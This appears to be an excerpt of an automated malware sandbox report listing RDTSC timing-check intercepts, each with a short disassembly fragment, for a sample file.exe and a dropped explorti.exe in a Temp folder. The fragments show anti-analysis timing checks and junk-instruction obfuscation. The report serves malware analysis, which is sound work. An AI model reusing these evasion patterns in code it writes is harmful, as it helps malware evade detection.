Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54F05B4 second address: 54F05E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF0BC8515E5h 0x0000000a sbb al, FFFFFFD6h 0x0000000d jmp 00007FF0BC8515E1h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A39 second address: 54E0A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A3F second address: 54E0A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A43 second address: 54E0A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF0BCB462BEh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FF0BCB462C0h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF0BCB462C7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A86 second address: 54E0A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0A8C second address: 54E0A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0845 second address: 54E085F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E085F second address: 54E0864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0864 second address: 54E08B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, 2Dh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dl, ah 0x0000000d pushfd 0x0000000e jmp 00007FF0BC8515E1h 0x00000013 sbb ecx, 63B33956h 0x00000019 jmp 00007FF0BC8515E1h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FF0BC8515E1h 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a mov dx, cx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E08B5 second address: 54E08B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0C74 second address: 54E0CBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, BA52h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FF0BC8515E4h 0x00000010 push eax 0x00000011 jmp 00007FF0BC8515DBh 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FF0BC8515E6h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0CBF second address: 54E0CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D8A second address: 54E0D90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D90 second address: 54E0D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D96 second address: 54E0D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D9A second address: 54E0D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0D9E second address: 54E0DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx eax, al 0x0000000b pushad 0x0000000c mov edi, eax 0x0000000e mov cx, 2023h 0x00000012 popad 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0DB8 second address: 54E0DBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54E0DBC second address: 54E0DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: B5F05E second address: B5F064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: B5E8ED second address: B5E8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: B5E8F1 second address: B5E8F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: B5E8F5 second address: B5E900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECEE second address: CDECF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECF3 second address: CDECFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF0BC8515D6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECFD second address: CDED07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BCB462B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D6A second address: CC9D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515DDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D7B second address: CC9D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D85 second address: CC9D8F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD54 second address: CDDD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF0BCB462B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD63 second address: CDDD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD7D second address: CDDD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD8A second address: CDDD8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD8E second address: CDDD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF0BCB462B6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD9E second address: CDDDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDDA4 second address: CDDDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDE095 second address: CDE099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDFEF8 second address: CDFEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDFEFC second address: CDFF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0121 second address: CE016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 68DD7A9Bh 0x00000011 js 00007FF0BCB462B6h 0x00000017 lea ebx, dword ptr [ebp+12454E62h] 0x0000001d mov dword ptr [ebp+122D2B95h], eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF0BCB462C8h 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE01D7 second address: CE0223 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FF0BC8515DAh 0x00000012 add dword ptr [ebp+122D1C9Eh], esi 0x00000018 pop ecx 0x00000019 push 00000000h 0x0000001b jmp 00007FF0BC8515E9h 0x00000020 mov dx, 4091h 0x00000024 call 00007FF0BC8515D9h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0223 second address: CE022D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE022D second address: CE0232 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0232 second address: CE0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007FF0BCB462BDh 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007FF0BCB462C4h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007FF0BCB462BBh 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jns 00007FF0BCB462B8h 0x00000035 push edx 0x00000036 pop edx 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE0286 second address: CE028C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CE028C second address: CE0290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549035B second address: 5490378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490378 second address: 54903D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BCB462C7h 0x00000009 xor ecx, 0193E86Eh 0x0000000f jmp 00007FF0BCB462C9h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FF0BCB462BCh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FF0BCB462BEh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54903D6 second address: 5490493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BC8515DCh 0x00000009 jmp 00007FF0BC8515E5h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FF0BC8515DCh 0x0000001a adc esi, 570448A8h 0x00000020 jmp 00007FF0BC8515DBh 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FF0BC8515E8h 0x0000002c xor ax, 3B08h 0x00000031 jmp 00007FF0BC8515DBh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FF0BC8515E0h 0x00000041 sub ch, 00000068h 0x00000044 jmp 00007FF0BC8515DBh 0x00000049 popfd 0x0000004a popad 0x0000004b push FFFFFFFEh 0x0000004d jmp 00007FF0BC8515E6h 0x00000052 push 3B19A7ADh 0x00000057 pushad 0x00000058 mov bl, 8Eh 0x0000005a push eax 0x0000005b push edx 0x0000005c push ecx 0x0000005d pop edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490493 second address: 5490526 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 3BE0186Bh 0x0000000e pushad 0x0000000f call 00007FF0BCB462BAh 0x00000014 mov dx, si 0x00000017 pop esi 0x00000018 call 00007FF0BCB462C7h 0x0000001d pop ebx 0x0000001e popad 0x0000001f push 16FA815Bh 0x00000024 jmp 00007FF0BCB462BBh 0x00000029 add dword ptr [esp], 5FF62CA5h 0x00000030 pushad 0x00000031 movzx esi, di 0x00000034 mov edi, 768EDF64h 0x00000039 popad 0x0000003a mov eax, dword ptr fs:[00000000h] 0x00000040 pushad 0x00000041 push edx 0x00000042 mov edi, esi 0x00000044 pop eax 0x00000045 pushfd 0x00000046 jmp 00007FF0BCB462C1h 0x0000004b or ax, 5A56h 0x00000050 jmp 00007FF0BCB462C1h 0x00000055 popfd 0x00000056 popad 0x00000057 nop 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490526 second address: 5490539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490539 second address: 5490597 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF0BCB462BFh 0x00000009 add eax, 1C07F43Eh 0x0000000f jmp 00007FF0BCB462C9h 0x00000014 popfd 0x00000015 jmp 00007FF0BCB462C0h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007FF0BCB462BBh 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov di, 0126h 0x0000002b mov cx, bx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490597 second address: 54905E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 1Ch 0x0000000c jmp 00007FF0BC8515E0h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FF0BC8515E7h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54905E0 second address: 549061F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0BCB462BFh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FF0BCB462BFh 0x00000013 xchg eax, ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF0BCB462C5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549061F second address: 5490652 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FF0BC8515E3h 0x00000012 pop ecx 0x00000013 mov edi, 0B913E8Ch 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490652 second address: 549066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549066F second address: 549068B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 549068B second address: 54906B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BCB462C5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54906B2 second address: 54906CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov si, 9BF3h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54906CF second address: 54907A0 instructions: 0x00000000 rdtsc 0x00000002 mov di, D5C8h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FF0BCB462BEh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 mov edi, ecx 0x00000013 pushfd 0x00000014 jmp 00007FF0BCB462BAh 0x00000019 jmp 00007FF0BCB462C5h 0x0000001e popfd 0x0000001f popad 0x00000020 mov eax, dword ptr [76FBB370h] 0x00000025 jmp 00007FF0BCB462BEh 0x0000002a xor dword ptr [ebp-08h], eax 0x0000002d jmp 00007FF0BCB462C0h 0x00000032 xor eax, ebp 0x00000034 jmp 00007FF0BCB462C1h 0x00000039 nop 0x0000003a jmp 00007FF0BCB462BEh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushfd 0x00000044 jmp 00007FF0BCB462BCh 0x00000049 and si, FF48h 0x0000004e jmp 00007FF0BCB462BBh 0x00000053 popfd 0x00000054 pushfd 0x00000055 jmp 00007FF0BCB462C8h 0x0000005a sbb al, FFFFFFA8h 0x0000005d jmp 00007FF0BCB462BBh 0x00000062 popfd 0x00000063 popad 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54907A0 second address: 54907B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0BC8515E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54907B8 second address: 54907CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF0BCB462BAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54907CD second address: 5490873 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007FF0BC8515E6h 0x00000011 mov dword ptr fs:[00000000h], eax 0x00000017 pushad 0x00000018 push esi 0x00000019 pushfd 0x0000001a jmp 00007FF0BC8515DDh 0x0000001f add ecx, 73802086h 0x00000025 jmp 00007FF0BC8515E1h 0x0000002a popfd 0x0000002b pop eax 0x0000002c mov dh, B7h 0x0000002e popad 0x0000002f mov esi, dword ptr [ebp+08h] 0x00000032 jmp 00007FF0BC8515E8h 0x00000037 mov eax, dword ptr [esi+10h] 0x0000003a jmp 00007FF0BC8515E0h 0x0000003f test eax, eax 0x00000041 jmp 00007FF0BC8515E0h 0x00000046 jne 00007FF12E280A93h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490873 second address: 5490890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5490890 second address: 54908FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007FF0BC8515E7h 0x00000010 mov dword ptr [ebp-20h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov si, bx 0x00000019 pushfd 0x0000001a jmp 00007FF0BC8515E7h 0x0000001f and ax, E9EEh 0x00000024 jmp 00007FF0BC8515E9h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 54908FF second address: 549092B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [esi] 0x0000000b jmp 00007FF0BCB462BEh 0x00000010 mov dword ptr [ebp-24h], ebx 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480F6B second address: 5480F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480F71 second address: 5480FA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF0BCB462C8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480FA1 second address: 5480FA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5480FA5 second address: 5480FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECF3 second address: CDECFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF0BCB462B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDECFD second address: CDED07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BC8515D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D6A second address: CC9D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462BDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CC9D85 second address: CC9D8F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD54 second address: CDDD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF0BC8515D6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe RDTSC instruction interceptor: First address: CDDD63 second address: CDDD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
